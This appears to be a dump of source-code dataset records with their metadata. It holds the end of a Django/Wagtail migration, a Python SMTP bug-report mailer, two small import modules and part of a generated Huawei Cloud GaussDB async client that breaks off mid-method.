field=core.model_fields.MarkdownField(help_text='Please include an h1 in this field e.g. # Heading level 1', validators=[core.validators.slug_hyperlinks]),
),
migrations.AlterField(
model_name='performancedashboardpage',
name='product_link',
field=models.TextField(choices=[('https://www.great.gov.uk', 'Great.gov.uk'), ('https://selling-online-overseas.export.great.gov.uk', 'Selling Online Overseas'), ('https://www.great.gov.uk/export-opportunities/', 'Export Opportunities'), ('https://www.great.gov.uk/find-a-buyer/', 'Business Profiles'), ('https://invest.great.gov.uk', 'Invest in Great Britain')], help_text='The slug and page heading are inferred from the product link', unique=True),
),
migrations.CreateModel(
name='EUExitFormPages',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'abstract': False,
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.CreateModel(
name='AllContactPagesPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('service_name', models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True)),
],
options={
'verbose_name': 'Forms',
},
bases=(core.models.ExclusivePageMixin, 'wagtailcore.page'),
),
migrations.AlterField(
model_name='articlelistingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='articlepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='campaignpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='countryguidepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitdomesticformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitformsuccesspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='euexitinternationalformpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='exportreadinessapp',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='getfinancepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='homepage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardnotespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='performancedashboardpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='privacyandcookiespage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='termsandconditionspage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='topiclandingpage',
name='service_name',
field=models.CharField(choices=[('FIND_A_SUPPLIER', 'Find a Supplier'), ('EXPORT_READINESS', 'Export Readiness'), ('INVEST', 'Invest'), ('COMPONENTS', 'Components'), ('GREAT_INTERNATIONAL', 'Great International')], db_index=True, max_length=100, null=True),
),
migrations.AddField(
model_name='homepage',
name='banner_content',
field=core.model_fields.MarkdownField(default='', validators=[core.validators.slug_hyperlinks]),
preserve_default=False,
),
migrations.AddField(
model_name='homepage',
name='banner_label',
field=models.CharField(blank=True, max_length=50, null=True),
),
]
| 66.866541
| 1,037
| 0.644759
| 3,571
| 35,573
| 6.197984
| 0.078969
| 0.076582
| 0.046989
| 0.046989
| 0.842498
| 0.834455
| 0.811142
| 0.805404
| 0.794831
| 0.758641
| 0
| 0.017778
| 0.209372
| 35,573
| 531
| 1,038
| 66.992467
| 0.769173
| 0.00194
| 0
| 0.799235
| 1
| 0
| 0.334723
| 0.081575
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001912
| 0.013384
| 0
| 0.021033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e7df70c258915d7e843436756251798bf210779e
| 5,689
|
py
|
Python
|
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
BugTracker-main/sendmail.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from config import app
# Sending confirmation email to the reporter
class ReporterSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'Thanks for reporting the bug'
# The message is written both as HTML and as plain text so that every mail client can render it
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of your report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
# Build a multipart/alternative message so clients can choose the HTML part or fall back to plain text
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = recipient_email
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
# Connect to the SMTP server (with Gmail, "less secure apps" access must be enabled for this to work)
server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
# Start a secure TLS connection and log in
server.starttls()
server.login(email, password)
# Serialize the MIME message to a string, send the email, then close the connection
text = msg.as_string()
server.sendmail(email, recipient_email, text)
server.quit()
class AdminSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'A new bug has been reported'
# The message is written both as HTML and as plain text so that every mail client can render it
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of the report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
# Build a multipart/alternative message so clients can choose the HTML part or fall back to plain text
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = app.config['ADMIN_EMAIL']
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
# Connect to the SMTP server (with Gmail, "less secure apps" access must be enabled for this to work)
server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
# Start a secure TLS connection and log in
server.starttls()
server.login(email, password)
# Serialize the MIME message to a string, send the email, then close the connection
text = msg.as_string()
server.sendmail(email, app.config['ADMIN_EMAIL'], text)
server.quit()
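A minimal usage sketch for the two mailer classes above, assuming the Flask app imported from config provides the SMTP_EMAIL, SMTP_PASSWORD, SMTP_HOST, SMTP_PORT and ADMIN_EMAIL keys the classes already read; the recipient address and report fields below are made-up demo values, not taken from the project:
if __name__ == '__main__':
    # Hypothetical demo values -- not part of the original module
    report = dict(
        recipient_email='reporter@example.com',
        system='Checkout service',
        severity='High',
        steps='1. Add an item to the cart 2. Apply a discount code',
        message='The order total is calculated twice',
    )
    # Thank the reporter, then notify the admin configured in ADMIN_EMAIL
    ReporterSendMail(**report)
    AdminSendMail(**report)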
| 87.523077
| 1,150
| 0.675163
| 829
| 5,689
| 4.604343
| 0.176116
| 0.03301
| 0.050301
| 0.029342
| 0.923238
| 0.91695
| 0.91695
| 0.91695
| 0.91695
| 0.91695
| 0
| 0.049028
| 0.168219
| 5,689
| 64
| 1,151
| 88.890625
| 0.757608
| 0.210933
| 0
| 0.666667
| 0
| 0.095238
| 0.636099
| 0.206218
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0.095238
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8210502e1752e0803b33f19665f590cd658aa20b
| 213
|
py
|
Python
|
store_item_models/store_item_uses/models.py
|
reimibeta/django-store-item-models
|
0be5fad0df0b3ebc7283fc6369f0e769a4743987
|
[
"Apache-2.0"
] | null | null | null |
store_item_models/store_item_uses/models.py
|
reimibeta/django-store-item-models
|
0be5fad0df0b3ebc7283fc6369f0e769a4743987
|
[
"Apache-2.0"
] | null | null | null |
store_item_models/store_item_uses/models.py
|
reimibeta/django-store-item-models
|
0be5fad0df0b3ebc7283fc6369f0e769a4743987
|
[
"Apache-2.0"
] | null | null | null |
# item use
from store_item_models.store_item_uses.class_models.store_item_use import StoreItemUse
# item use stock
from store_item_models.store_item_uses.class_models.store_item_use_stock import StoreItemUseStock
| 42.6
| 97
| 0.892019
| 34
| 213
| 5.147059
| 0.323529
| 0.308571
| 0.342857
| 0.217143
| 0.628571
| 0.628571
| 0.628571
| 0.628571
| 0.628571
| 0.628571
| 0
| 0
| 0.070423
| 213
| 4
| 98
| 53.25
| 0.883838
| 0.107981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
415c027dc1277d4f4c87bdbcc810f59cf45c0689
| 54
|
py
|
Python
|
convokit/emotion/__init__.py
|
calebchiam/cs6742-fork
|
14dc879849ada4c08059c21f8b9721c0c3dbcebf
|
[
"MIT"
] | null | null | null |
convokit/emotion/__init__.py
|
calebchiam/cs6742-fork
|
14dc879849ada4c08059c21f8b9721c0c3dbcebf
|
[
"MIT"
] | null | null | null |
convokit/emotion/__init__.py
|
calebchiam/cs6742-fork
|
14dc879849ada4c08059c21f8b9721c0c3dbcebf
|
[
"MIT"
] | 1
|
2020-01-17T17:27:16.000Z
|
2020-01-17T17:27:16.000Z
|
from .emotion import *
from .emotion import EmoTracker
| 27
| 31
| 0.814815
| 7
| 54
| 6.285714
| 0.571429
| 0.5
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 54
| 2
| 31
| 27
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
41b26753c3bcb443658c19ec29606b3106462eab
| 68,630
|
py
|
Python
|
huaweicloud-sdk-gaussdb/huaweicloudsdkgaussdb/v3/gaussdb_async_client.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-gaussdb/huaweicloudsdkgaussdb/v3/gaussdb_async_client.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-gaussdb/huaweicloudsdkgaussdb/v3/gaussdb_async_client.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
from __future__ import absolute_import
import datetime
import re
import importlib
import six
from huaweicloudsdkcore.client import Client, ClientBuilder
from huaweicloudsdkcore.exceptions import exceptions
from huaweicloudsdkcore.utils import http_utils
from huaweicloudsdkcore.sdk_stream_request import SdkStreamRequest
class GaussDBAsyncClient(Client):
"""
:param configuration: .Configuration object for this client
:param pool_threads: The number of threads to use for async requests
to the API. More threads means more concurrent API requests.
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long,
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self):
super(GaussDBAsyncClient, self).__init__()
self.model_package = importlib.import_module("huaweicloudsdkgaussdb.v3.model")
self.preset_headers = {'User-Agent': 'HuaweiCloud-SDK-Python'}
@classmethod
def new_builder(cls, clazz=None):
if clazz is None:
return ClientBuilder(cls)
if clazz.__name__ != "GaussDBClient":
raise TypeError("client type error, support client type is GaussDBClient")
return ClientBuilder(clazz)
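# Usage sketch (an assumption, not taken from this module): clients from this SDK are
# normally assembled through the core ClientBuilder returned by new_builder(), roughly:
#
#     from huaweicloudsdkcore.auth.credentials import BasicCredentials
#     credentials = BasicCredentials(ak, sk, project_id)
#     client = GaussDBAsyncClient.new_builder() \
#         .with_credentials(credentials) \
#         .with_endpoint(endpoint) \
#         .build()
#
# Treat BasicCredentials, with_credentials, with_endpoint and build as assumptions about
# huaweicloudsdkcore rather than facts documented in this file; each *_async method below
# then hands its request object to call_api on the shared core Client.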
def change_gauss_my_sql_instance_specification_async(self, request):
"""Change instance specification
Changes the specification of a database instance.
:param ChangeGaussMySqlInstanceSpecificationRequest request
:return: ChangeGaussMySqlInstanceSpecificationResponse
"""
return self.change_gauss_my_sql_instance_specification_with_http_info(request)
def change_gauss_my_sql_instance_specification_with_http_info(self, request):
"""Change instance specification
Changes the specification of a database instance.
:param ChangeGaussMySqlInstanceSpecificationRequest request
:return: ChangeGaussMySqlInstanceSpecificationResponse
"""
all_params = ['instance_id', 'mysql_change_specification_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/action',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ChangeGaussMySqlInstanceSpecificationResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_backup_async(self, request):
"""Create a manual backup
Creates a manual backup.
:param CreateGaussMySqlBackupRequest request
:return: CreateGaussMySqlBackupResponse
"""
return self.create_gauss_my_sql_backup_with_http_info(request)
def create_gauss_my_sql_backup_with_http_info(self, request):
"""Create a manual backup
Creates a manual backup.
:param CreateGaussMySqlBackupRequest request
:return: CreateGaussMySqlBackupResponse
"""
all_params = ['mysql_create_backup_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/backups/create',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlBackupResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_instance_async(self, request):
"""Create a database instance
Creates a GaussDB(for MySQL) cloud database instance.
:param CreateGaussMySqlInstanceRequest request
:return: CreateGaussMySqlInstanceResponse
"""
return self.create_gauss_my_sql_instance_with_http_info(request)
def create_gauss_my_sql_instance_with_http_info(self, request):
"""Create a database instance
Creates a GaussDB(for MySQL) cloud database instance.
:param CreateGaussMySqlInstanceRequest request
:return: CreateGaussMySqlInstanceResponse
"""
all_params = ['create_instance_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlInstanceResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_proxy_async(self, request):
"""Enable database proxy
Enables the database proxy; only ELB mode is supported.
:param CreateGaussMySqlProxyRequest request
:return: CreateGaussMySqlProxyResponse
"""
return self.create_gauss_my_sql_proxy_with_http_info(request)
def create_gauss_my_sql_proxy_with_http_info(self, request):
"""Enable database proxy
Enables the database proxy; only ELB mode is supported.
:param CreateGaussMySqlProxyRequest request
:return: CreateGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'x_language', 'create_mysql_proxy_request']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_gauss_my_sql_readonly_node_async(self, request):
"""Create a read-only node
Creates a read-only node.
:param CreateGaussMySqlReadonlyNodeRequest request
:return: CreateGaussMySqlReadonlyNodeResponse
"""
return self.create_gauss_my_sql_readonly_node_with_http_info(request)
def create_gauss_my_sql_readonly_node_with_http_info(self, request):
"""Create a read-only node
Creates a read-only node.
:param CreateGaussMySqlReadonlyNodeRequest request
:return: CreateGaussMySqlReadonlyNodeResponse
"""
all_params = ['instance_id', 'mysql_create_readonly_node_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/nodes/enlarge',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreateGaussMySqlReadonlyNodeResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_gauss_my_sql_instance_async(self, request):
"""Delete an instance
Deletes a database instance; yearly/monthly (prepaid) instances cannot be deleted this way.
:param DeleteGaussMySqlInstanceRequest request
:return: DeleteGaussMySqlInstanceResponse
"""
return self.delete_gauss_my_sql_instance_with_http_info(request)
def delete_gauss_my_sql_instance_with_http_info(self, request):
"""Delete an instance
Deletes a database instance; yearly/monthly (prepaid) instances cannot be deleted this way.
:param DeleteGaussMySqlInstanceRequest request
:return: DeleteGaussMySqlInstanceResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteGaussMySqlInstanceResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_gauss_my_sql_proxy_async(self, request):
"""Disable database proxy
Disables the database proxy.
:param DeleteGaussMySqlProxyRequest request
:return: DeleteGaussMySqlProxyResponse
"""
return self.delete_gauss_my_sql_proxy_with_http_info(request)
def delete_gauss_my_sql_proxy_with_http_info(self, request):
"""Disable database proxy
Disables the database proxy.
:param DeleteGaussMySqlProxyRequest request
:return: DeleteGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_gauss_my_sql_readonly_node_async(self, request):
"""Delete a read-only node
Deletes a read-only node of an instance. In multi-AZ mode, a read-only node can be deleted only if the remaining read-only nodes and the primary node still sit in different availability zones afterwards.
:param DeleteGaussMySqlReadonlyNodeRequest request
:return: DeleteGaussMySqlReadonlyNodeResponse
"""
return self.delete_gauss_my_sql_readonly_node_with_http_info(request)
def delete_gauss_my_sql_readonly_node_with_http_info(self, request):
"""Delete a read-only node
